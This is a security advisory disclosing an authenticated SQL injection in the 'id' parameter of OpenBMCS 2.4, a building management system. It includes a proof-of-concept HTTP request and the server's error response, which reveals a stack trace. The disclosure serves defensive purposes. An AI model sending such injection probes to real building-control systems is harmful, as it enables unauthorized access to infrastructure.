OpenBMCS 2.4 Authenticated SQL Injection Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via the 'id' GET parameter is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Semen 'samincube' Rozhkov @zeroscience Advisory ID: ZSL-2022-5692 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php 26.10.2021 -- The following PoC request demonstrates the issue (authenticated user session is required): GET /debug/obix_test.php?id=1%22 HTTP/1.1 Host: 192.168.1.222 Cookie: PHPSESSID=ssid123ssid123ssid1234ssid Connection: close Response: HTTP/1.1 200 OK Date: Sat, 1 Jan 2022 15:09:54 GMT Server: Apache/2.4.10 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 629 Connection: close Content-Type: text/html; charset=UTF-8
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: """' in /var/www/openBMCS/classes/dbconnection.php:146 Stack trace: #0 /var/www/openBMCS/classes/dbconnection.php(146): PDO->query('SELECT ip_addre...') #1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB->querySingle('SELECT ip_addre...', true) #2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1"', '/obix/config') #3 {main} thrown in /var/www/openBMCS/classes/dbconnection.php on line 146